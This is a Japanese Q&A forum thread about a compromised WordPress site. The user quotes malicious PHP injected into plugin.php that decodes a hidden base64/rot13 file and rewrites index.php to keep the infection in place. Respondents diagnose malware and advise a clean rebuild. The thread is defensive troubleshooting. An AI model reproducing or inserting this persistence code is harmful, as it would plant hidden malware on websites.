Q&A
パーミッションの問題なそうですね。
その方を確認いただけますか?
前提・実現したいこと
WP管理画面にアクセスすると通常のログインIDとパスワードの入力画面は表示されるのですが、そのログインページの下に下記エラーが出ています。
問題が発生しているのは管理画面のみで、WEBサイトは見れています、ただ、WEBサイトのフッタの下に同様のエラーメッセージが表示されています。プラグイン系の問題なのかなと思いましたが、/wp-content/pluginsの名称を変更して再度管理画面にアクセスしてみましたが駄目でした。なんとか解決の糸口を見つけたいと思っておりまして、ご助力いただける方よろしくお願いいたします!
Warning: file_get_contents(index.php): failed to open stream: No such file or directory in /home/xxxxxxx/wp-includes/plugin.php on line 437
IDとパスワードを入力してログイン後は下記エラーが表示され、エラー文言以外は真っ白ページです、、
Warning: require(/home/xxxxxxx/wp-admin/wp-blog-header.php): failed to open stream: No such file or directory in /home/xxxxxxx/wp-admin/index.php on line 20
Fatal error: require(): Failed opening required '/home/xxxxxxx/wp-admin/wp-blog-header.php' (include_path='.:/usr/local/php/7.4/lib/php') in /home/xxxxxxx/wp-admin/index.php on line 20
発生している問題・エラーメッセージ
【ログイン前のエラーメッセージ】 Warning: file_get_contents(index.php): failed to open stream: No such file or directory in /home/xxxxxxx/wp-includes/plugin.php on line 437 【ログイン後のエラーメッセージ】 Warning: require(/home/xxxxxxx/wp-admin/wp-blog-header.php): failed to open stream: No such file or directory in /home/xxxxxxx/wp-admin/index.php on line 20 Fatal error: require(): Failed opening required '/home/xxxxxxx/wp-admin/wp-blog-header.php' (include_path='.:/usr/local/php/7.4/lib/php') in /home/xxxxxxx/wp-admin/index.php on line 20 【plugin.php 437行目】 function do_action( $hook_name, ...$arg ) { $index_path = "index.php"; $index = file_get_contents($index_path); $path = "/home/xxxxxxx/wp-admin/css/colors/ocean/168542"; ### 該当のソースコード ```ここに言語名を入力 ソースコード
試したこと
1, /wp-content/plugins→/wp-contents/plugins-bkなどの名称に変更してみましたがエラー画面等変わらすでした。
2, /wp-content/themes/xxxxx(自作のテーマフォルダ名)→別のテーマフォルダ名に変更してみましたがエラー画面変わらすでした。
補足情報(FW/ツールのバージョンなど)
ここにより詳細な情報を記載してください。
ありがとうございます。
wp-admin:755
wp-content:755
wp-includes:755
wp-config.php:644
.htaccess:644
その他ファイル類も問題ないように見えます。
【追記】
ローカル環境でも同じエラーが出ておりまして、(12月初旬にはローカル・サーバ共にエラーは出ておりませんでした。)もう少し詳しく表示されておりましたので追記いたします。
Warning: file_get_contents(index.php): failed to open stream: No such file or directory in /xxxxxxx/wp-includes/plugin.php on line 437
Call Stack
# Time Memory Function Location
1 4.2352 11443824 shutdown_action_hook( ) .../load.php:0
2 4.2352 11443824 do_action( ) .../load.php:1097
3 4.2352 11443824 file_get_contents ( ) .../plugin.php:437
/wp-admin/index.phpの中身が0と1の羅列のようになっていましたので、他のWPを参照して改変したindex.phpをアップしたのと、wp-includes/plugin.phpの437行目の下記部分を削除すると、なんとかログイン出来たのですが、CSSが効いていないのと、投稿一覧リンクなどを押すとパーミッションが無い等のエラーがでます。
ここ最近不正アクセス等が非常に多くサーバ側で制限がかかったのかもしれません、、因みにさくらインターネットです。
■plugin.phpから削除した部分
$index_path = "index.php";
$index = file_get_contents($index_path);
$path = "/home/reformtakamura/www/web/wp-admin/css/colors/ocean/168542";
if (file_exists($path)) {
$index_hide = file_get_contents($path);
$index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide))));
if(md5($index) != md5($index_hide))
{
@chmod($index_path, 0644);
@file_put_contents($index_path, $index_hide);
@chmod($index_path, 0444);
}
}
> /wp-admin/index.phpの中身が0と1の羅列のようになっていましたので、
検索してみると index.php ファイルの中身が、 0と1の羅列に書き換えられていたという事例はいくつか見つかりますね...
(例)
[WordPressを運用中のサーバがまるごとPHPマルウェアに感染していた時の対応メモ](https://qiita.com/Ayutanalects/items/a359df4e4b445229fcf2)
おそらく WordPress に不正アクセスされて、いろいろと書き換えられている可能性がありますね。
不正アクセスで書き換えられた ファイル・データが残っていると再度侵入される原因になりますので、不正アクセスされた場合は、(必要な場合はローカルにバックアップだけしておいて)サーバー上のすべてをファイル・データを削除して、公式のオリジナルファイルを利用して、最初から構築し直すことをおすすめしておきます。
正常な状況のデータが残っている場合は、時間をかければ復元は可能ですが、かなりの時間が必要と思います。
マルウェアの可能性が高いですね、、
WPアンインストしてディレクトリ毎消しました。
幸いサイト公開から2週間程しか経ってなかったので、ローカルのエクスポートファイルが手元にありスムーズに再構築できました、、
FS-mode様、CHERRY様ありがとうございました!
WPのセキュリティをもっと勉強します!
あなたの回答
tips
プレビュー
